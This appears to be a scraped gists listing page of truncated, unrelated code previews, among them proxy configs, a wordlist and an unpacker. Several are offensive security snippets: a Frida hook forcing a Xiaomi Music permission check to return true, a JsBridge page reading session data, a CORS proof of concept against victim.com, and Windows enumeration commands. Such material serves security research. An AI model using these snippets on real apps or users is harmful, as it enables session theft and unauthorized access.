<activity android:name=".PackageInstallerActivity">
<intent-filter>
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<data android:scheme="content" />
<data android:scheme="file" />
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
proxies: | |
- name: Charles | |
type: socks5 | |
server: 127.0.0.1 | |
port: 8889 | |
- name: v2ray | |
type: socks5 | |
server: 127.0.0.1 | |
port: 10809 | |
proxy-groups: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
proxies: | |
- name: Charles | |
type: socks5 | |
server: 127.0.0.1 | |
port: 8889 | |
- name: v2ray | |
type: socks5 | |
server: 127.0.0.1 | |
port: 10809 | |
proxy-groups: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0 | |
00 | |
01 | |
02 | |
03 | |
1 | |
1.0 | |
10 | |
100 | |
1000 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
private String config(Config config, boolean z) { | |
if (z) { | |
SecurityManager securityManager = new SecurityManager(config, this.mActivity.getApplicationContext()); | |
if (securityManager.isExpired() || !securityManager.isValidSignature()) { // validation of the config object | |
return new Response(202).toString(); | |
} | |
} | |
this.mFM = new FeatureManager(config, this.mActivity.getClassLoader()); | |
this.mPM = new PermissionManager(config); | |
return new Response(0).toString(); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Java.perform(function() { | |
console.log("Starting hook"); | |
var Activity = Java.use("com.xiaomi.music.hybrid.internal.PermissionManager"); | |
Activity.isValid.implementation = function () { | |
return true; | |
}; | |
Java.choose("com.xiaomi.music.hybrid.internal.Config", { | |
onMatch: function(inst) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<body> | |
<script src='remote-server/jsBridge-mix.js'> //host the jsBridge-mix.js from resources directory | |
JsBridge.invoke("get_session_data", {}, function(a) { //the a variable will contain the response JSON object from the Java code | |
var i = {}; | |
i = a; | |
window.alert(JSON.stringify(i); | |
}) | |
</script> | |
</body> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# coding: utf-8 | |
# py2 origin author lrdcq | |
# usage python3 unwxapkg.py filename | |
__author__ = 'Integ: https://github.com./integ' | |
import sys, os | |
import struct | |
class WxapkgFile(object): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# GET Method | |
<script type="text/javascript"> | |
var req = new XMLHttpRequest(); | |
req.onload = reqListener; | |
req.open("get","victim.com/getUserInfo",true); | |
req.withCredentials = true; | |
req.send(); | |
function reqListener(){alert(req.responseText);} | |
</script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// What system are we connected to? | |
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" | |
// Get the hostname and username (if available) | |
hostname | |
echo %username% | |
// Get users | |
net users | |
net user [username] |